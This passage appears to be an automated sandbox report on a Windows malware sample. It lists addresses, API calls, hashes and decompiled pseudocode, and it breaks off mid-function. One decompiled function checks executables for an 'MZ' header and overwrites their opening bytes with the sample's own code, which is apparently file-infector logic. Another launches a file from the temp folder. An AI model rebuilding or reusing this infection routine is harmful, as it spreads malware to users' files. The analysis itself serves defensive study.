                                                                          0x00406997
                                                                          0x00406992
                                                                          0x0040698f
                                                                          0x0040698d
                                                                          0x00406a1a
                                                                          0x00406a1e
                                                                          0x00406a89
                                                                          0x00406a9d
                                                                          0x00406aa7
                                                                          0x00406ab0
                                                                          0x00406ac0
                                                                          0x00406acb
                                                                          0x00406ad0
                                                                          0x00406ad2
                                                                          0x00000000
                                                                          0x00406ad4
                                                                          0x00406ad4
                                                                          0x00000000
                                                                          0x00406ad4
                                                                          0x00406a20
                                                                          0x00406a37
                                                                          0x00406a45
                                                                          0x00406a47
                                                                          0x00406a58
                                                                          0x00406a69
                                                                          0x00406a75
                                                                          0x00406a7a
                                                                          0x00406a7b
                                                                          0x00406a7d
                                                                          0x00000000
                                                                          0x00406a7f
                                                                          0x00406a7f
                                                                          0x00000000
                                                                          0x00406a7f
                                                                          0x00406a49
                                                                          0x00406a49
                                                                          0x00000000
                                                                          0x00406a49
                                                                          0x00406a47
                                                                          0x0040695e
                                                                          0x0040695e
                                                                          0x00000000
                                                                          0x0040695e
                                                                          0x004068a7
                                                                          0x004068a7
                                                                          0x004068ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004068ab
                                                                          0x00000000
                                                                          0x00406adb
                                                                          0x00406adb
                                                                          0x00406ade
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00000000
                                                                          0x00406895
                                                                          0x004066cd
                                                                          0x004066ce
                                                                          0x004066d4
                                                                          0x004066d7
                                                                          0x004066da
                                                                          0x004066e2
                                                                          0x004066e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406700
                                                                          0x00406705
                                                                          0x0040670b
                                                                          0x00406713
                                                                          0x0040671f
                                                                          0x0040671f
                                                                          0x0040672e
                                                                          0x00406733
                                                                          0x00406738
                                                                          0x0040673d
                                                                          0x00406752
                                                                          0x0040675c
                                                                          0x0040676b
                                                                          0x00406770
                                                                          0x00406789
                                                                          0x0040678e
                                                                          0x00406792
                                                                          0x00406796
                                                                          0x004067b1
                                                                          0x004067b1
                                                                          0x004067c2
                                                                          0x004067c5
                                                                          0x004067d7
                                                                          0x004067dd
                                                                          0x004067f4
                                                                          0x004067f9
                                                                          0x004067fd
                                                                          0x004067df
                                                                          0x004067e4
                                                                          0x004067e9
                                                                          0x004067e9
                                                                          0x004067c7
                                                                          0x004067cc
                                                                          0x004067d1
                                                                          0x004067d1
                                                                          0x00406798
                                                                          0x00406798
                                                                          0x0040679d
                                                                          0x00000000
                                                                          0x0040679f
                                                                          0x0040679f
                                                                          0x004067a3
                                                                          0x004067ab
                                                                          0x004067ab
                                                                          0x0040679d
                                                                          0x0040673f
                                                                          0x0040673f
                                                                          0x0040673f
                                                                          0x00406813
                                                                          0x0040681d
                                                                          0x00406826
                                                                          0x0040683c
                                                                          0x00406842
                                                                          0x00406858
                                                                          0x00406867
                                                                          0x0040686a
                                                                          0x0040686e
                                                                          0x0040686e
                                                                          0x0040686e
                                                                          0x00406871
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040685a
                                                                          0x0040685a
                                                                          0x00000000
                                                                          0x0040685a
                                                                          0x00000000
                                                                          0x00406858
                                                                          0x00000000
                                                                          0x004066d7
                                                                          0x004066c7
                                                                          0x00000000

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                            • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                            • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                            • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004071D0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E00407493);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x40748c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407130(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E00407080( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}
























                                                                          0x004071d0
                                                                          0x004071d1
                                                                          0x004071d3
                                                                          0x004071d4
                                                                          0x004071d4
                                                                          0x00407466
                                                                          0x00407468
                                                                          0x0040746b
                                                                          0x0040746e
                                                                          0x0040747e
                                                                          0x0040748b
                                                                          0x004071d9
                                                                          0x004071d9
                                                                          0x004071df
                                                                          0x004071e0
                                                                          0x004071e0
                                                                          0x004071e1
                                                                          0x00000000
                                                                          0x004071e3
                                                                          0x004071ec
                                                                          0x004071f1
                                                                          0x004071f7
                                                                          0x004071fd
                                                                          0x00407203
                                                                          0x0040720f
                                                                          0x00407216
                                                                          0x00407217
                                                                          0x0040721c
                                                                          0x0040721f
                                                                          0x00407222
                                                                          0x00407236
                                                                          0x0040724b
                                                                          0x0040725a
                                                                          0x00407268
                                                                          0x00407273
                                                                          0x00407283
                                                                          0x0040728c
                                                                          0x00407290
                                                                          0x00407298
                                                                          0x004072a4
                                                                          0x004072b7
                                                                          0x004072bf
                                                                          0x004072de
                                                                          0x004072e8
                                                                          0x004072fc
                                                                          0x00407303
                                                                          0x00407309
                                                                          0x00407315
                                                                          0x00407318
                                                                          0x0040731d
                                                                          0x00407325
                                                                          0x0040732a
                                                                          0x0040732a
                                                                          0x00407334
                                                                          0x0040733b
                                                                          0x00407344
                                                                          0x0040734d
                                                                          0x00407359
                                                                          0x00407368
                                                                          0x00407379
                                                                          0x00407380
                                                                          0x00407387
                                                                          0x00407399
                                                                          0x0040739e
                                                                          0x004073b1
                                                                          0x004073bd
                                                                          0x004073d2
                                                                          0x004073e4
                                                                          0x004073f7
                                                                          0x0040740a
                                                                          0x00407415
                                                                          0x00407426
                                                                          0x00407431
                                                                          0x00407443
                                                                          0x00407443
                                                                          0x004073bd
                                                                          0x0040744a
                                                                          0x00407455
                                                                          0x00407461
                                                                          0x00407461
                                                                          0x00407455
                                                                          0x00407303
                                                                          0x004072e8
                                                                          0x004072bf
                                                                          0x00407298
                                                                          0x00000000
                                                                          0x0040724b

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                          • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 298 401788-4017aa RtlInitializeCriticalSection 299 4017b6-4017ec call 40114c * 3 LocalAlloc 298->299 300 4017ac-4017b1 RtlEnterCriticalSection 298->300 307 40181d-401831 299->307 308 4017ee 299->308 300->299 311 401833-401838 RtlLeaveCriticalSection 307->311 312 40183d 307->312 309 4017f3-401805 308->309 309->309 313 401807-401816 309->313 311->312 313->307
                                                                          C-Code - Quality: 68%
                                                                          			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x640868
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}








                                                                          0x0040178d
                                                                          0x0040178e
                                                                          0x00401793
                                                                          0x00401796
                                                                          0x00401799
                                                                          0x0040179e
                                                                          0x004017aa
                                                                          0x004017ac
                                                                          0x004017b1
                                                                          0x004017b1
                                                                          0x004017bb
                                                                          0x004017c5
                                                                          0x004017cf
                                                                          0x004017db
                                                                          0x004017e0
                                                                          0x004017ec
                                                                          0x004017ee
                                                                          0x004017f3
                                                                          0x004017f3
                                                                          0x004017fb
                                                                          0x004017ff
                                                                          0x00401800
                                                                          0x0040180c
                                                                          0x0040180f
                                                                          0x00401811
                                                                          0x00401816
                                                                          0x00401816
                                                                          0x0040181f
                                                                          0x00401822
                                                                          0x00401825
                                                                          0x00401831
                                                                          0x00401833
                                                                          0x00401838
                                                                          0x00000000
                                                                          0x00401838
                                                                          0x0040183d

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,020DD588,?,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 314 406b48-406b72 315 406b74-406b7c 314->315 316 406bbc-406be9 call 405968 call 403b24 314->316 317 406b7f-406b85 315->317 329 406c26-406c36 call 403970 call 406638 316->329 330 406beb-406bf3 316->330 320 406c7b-406c96 call 403b30 317->320 321 406b8b-406b94 317->321 324 406bb3-406bba 321->324 325 406b96-406b9a 321->325 324->316 324->317 328 406b9d-406ba7 325->328 328->320 332 406bad-406bb1 328->332 337 406c3b-406c3d 329->337 333 406bf6-406c24 GetIconInfo 330->333 332->324 332->328 333->329 333->333 338 406c4c-406c58 call 403970 337->338 339 406c3f-406c47 call 405990 337->339 338->320 343 406c5a-406c5b 338->343 339->338 344 406c62-406c6d 343->344 345 406c75-406c79 344->345 346 406c6f-406c70 DeleteObject 344->346 345->320 345->344 346->345
                                                                          C-Code - Quality: 89%
                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t65;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					_t65 = E00406638(_v28, _v16, E00403970()); // executed
					if(_t65 == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}




























                                                                          0x00406b53
                                                                          0x00406b56
                                                                          0x00406b59
                                                                          0x00406b5c
                                                                          0x00406b61
                                                                          0x00406b62
                                                                          0x00406b67
                                                                          0x00406b6a
                                                                          0x00406b6d
                                                                          0x00406b72
                                                                          0x00406bbc
                                                                          0x00406bc4
                                                                          0x00406bcd
                                                                          0x00406bdc
                                                                          0x00406be4
                                                                          0x00406be9
                                                                          0x00406beb
                                                                          0x00406bec
                                                                          0x00406bf3
                                                                          0x00406bf6
                                                                          0x00406c00
                                                                          0x00406c08
                                                                          0x00406c10
                                                                          0x00406c19
                                                                          0x00406c1d
                                                                          0x00406c20
                                                                          0x00406c23
                                                                          0x00406c23
                                                                          0x00406bf6
                                                                          0x00406c36
                                                                          0x00406c3d
                                                                          0x00406c47
                                                                          0x00406c47
                                                                          0x00406c54
                                                                          0x00406c58
                                                                          0x00406c5a
                                                                          0x00406c5b
                                                                          0x00406c62
                                                                          0x00406c68
                                                                          0x00406c6d
                                                                          0x00406c70
                                                                          0x00406c70
                                                                          0x00406c75
                                                                          0x00406c78
                                                                          0x00406c78
                                                                          0x00406c62
                                                                          0x00406b74
                                                                          0x00406b74
                                                                          0x00406b75
                                                                          0x00406b7c
                                                                          0x00406b7f
                                                                          0x00406b8e
                                                                          0x00406b92
                                                                          0x00406b94
                                                                          0x00406bb3
                                                                          0x00406bb3
                                                                          0x00406bb6
                                                                          0x00406bb9
                                                                          0x00406bba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b96
                                                                          0x00406b96
                                                                          0x00406b9a
                                                                          0x00406b9d
                                                                          0x00406bad
                                                                          0x00406bb0
                                                                          0x00406bb1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406bb1
                                                                          0x00406b9d
                                                                          0x00000000
                                                                          0x00406b94
                                                                          0x00406b7f
                                                                          0x00406c7b
                                                                          0x00406c7d
                                                                          0x00406c80
                                                                          0x00406c83
                                                                          0x00406c8b
                                                                          0x00406c96

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004078A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 72%
                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
				_push(1);
				_push(0);
				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00407993);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}








                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078a6
                                                                          0x004078ae
                                                                          0x004078bf
                                                                          0x004078d0
                                                                          0x004078d5
                                                                          0x004078d7
                                                                          0x004078e1
                                                                          0x004078f1
                                                                          0x004078f8
                                                                          0x00407913
                                                                          0x00407926
                                                                          0x00407937
                                                                          0x0040794d
                                                                          0x00407958
                                                                          0x00407963
                                                                          0x00407969
                                                                          0x00407970
                                                                          0x00407973
                                                                          0x00407976
                                                                          0x0040798b

                                                                          APIs
                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004079A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 51%
                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t31;
				void* _t59;
				intOrPtr _t73;
				void* _t82;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t82 = __edi;
				_t54 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
